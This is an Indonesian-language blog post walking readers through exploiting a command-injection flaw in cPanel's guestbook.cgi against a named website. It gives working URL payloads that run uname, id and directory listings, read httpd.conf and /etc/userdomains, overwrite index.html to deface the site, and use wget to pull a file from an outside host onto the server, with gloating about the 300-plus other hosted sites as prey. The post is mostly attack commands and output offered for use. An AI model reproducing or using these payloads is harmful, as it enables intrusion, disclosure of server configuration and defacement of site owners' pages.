Pages

Subscribe:

Friday, May 02, 2008

Mengeksploitasi Cpanel <= 5

CPanel adalah control panel untuk web-web hosting yang sangat populer..

hampir 80% web hosting menggunakan CPanel karena kemudahannya..

Di CPanel versi <= 5 (beberapa gw tes 5.3 bisa masuk juga), ada vulnerability

di guestbook.cgi CPanelnya yang memungkinkan semua orang untuk menginject code

dengan user id domain tersebut....

lebih lanjut...

OK.. sekarang kita cari target dulu...

untuk tau satu website itu diinstall cpanel ato gak, coba buka www.domain.com:2082 ato www.domain.com:2086 di browser.

ntar kalo diprompt untuk password, berarti terinstall sekaligus bisa check versi dari cpanel tersebut.

nach.. setelah dapat... kita inject aja code kita ke website itu.

-----------------

input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|uname+-a| --> masukkan ini ke browser

output: Linux host5.hostsoln.com 2.4.18-10 #1 Wed Aug 7 11:39:21 EDT 2002 i686 unknown

--------------------

wow... keren.. server linux + cpanel ada lubang ;)

skrg kita coba liat kita dapat akses apa di server tersebut....

----------------

input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|id|

output: uid=32050(gamerx) gid=551(gamerx) groups=551(gamerx)

---------------

wach... cuman id biasa aja, gak ada root :(

tapi gak papa dengan id ini aja udah bisa deface site itu kekeke....

sekarang kita cari dimana home directory dari domain ini...

---------------

input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|ls+/home|

output: ... flange food fpa frankie frenzz fsguide gamerx giankc gideon glennng gotech gotrail griffin griffins h8mie...

--------------

tuch nampak di directory /home (yang ditebak) ada directory gamerx,..

kayaknya home directory dari website yang mau kita hajar...

coba liat lagi ke dalam.....

--------------

input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|ls+/home/gamerx|

output: IDM Michael Perlin Remy etc mail public_ftp public_html tmp www

--------------

siip... ada public_html

gw ingat di hosting hosting gratis.. biasanya file file ditaruh di sana...

tes lagi....

-------------

input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|ls+/home/gamerx/public_html|

output: ADDONS-MODULES BLOCKS CHANGES COPYING CREDITS INSTALL PHP-Nuke-5.6.tar.gz README SUPPORT TODO TRANSLATIONS UPGRADE cgi-bin clans forum forums gamerx.gif gamerxenter.gif html index.html lan sql

---------------

mantapp... ini dia yang gw cari.. "index.html"

sekarang tinggal deface aja pake perintah echo macam zaman zaman unicode dulu ;)

------------

input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|echo+Boom!+>+/home/gamerx/public_html/index.html|

output: lha... kok gak ada output?????

------------

grrr.... coba ke www.gamerxonline.com

wow.. nampak "Boom!" nya

kekekekekekeke... siip.. berhasil....

tunggu.. dulu... gw inget kalo web hostingan pasti ngehost banyak websites....

mmm....

coba check dech configurasi httpd.confnya, liat ada virtual2 hosts yg di host gak...

------------

input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|cat+/usr/local/apache/conf/httpd.conf|

output: .... .... etc... ... ServerAlias www.ourwedding-ceremony.com ourwedding-ceremony.com ServerAdmin webmaster@ourwedding-ceremony.com DocumentRoot /home/cmli/public_html .... etc ... etc....

------------

wow.. gila.. ada 300 lebih sites yang dihosting....

mangsa yang enak dimakan mwhahahahaha....

langsung nampak home directorynya lagi ama domain siip.. gak usah tebak tebak....

ato lebih mudah check /etc/userdomains (lebih simple)

---------------------

input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|cat+/etc/userdomains|

[THX to AS_ROMA]

----------------------

heh.. lho.. kok kalo echo lebih dari 1 kata gak bisa??

aneh... padahal dulu zaman unicode bisa...

gini dech.. kita pake wget...

kamu masukkan file kamu di hosting hosting gratis....

terus input ini:

http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|wget+website.kamu.com/file.html+-O+/home/gamerx/public_html/index.html|

0 comments:

Post a Comment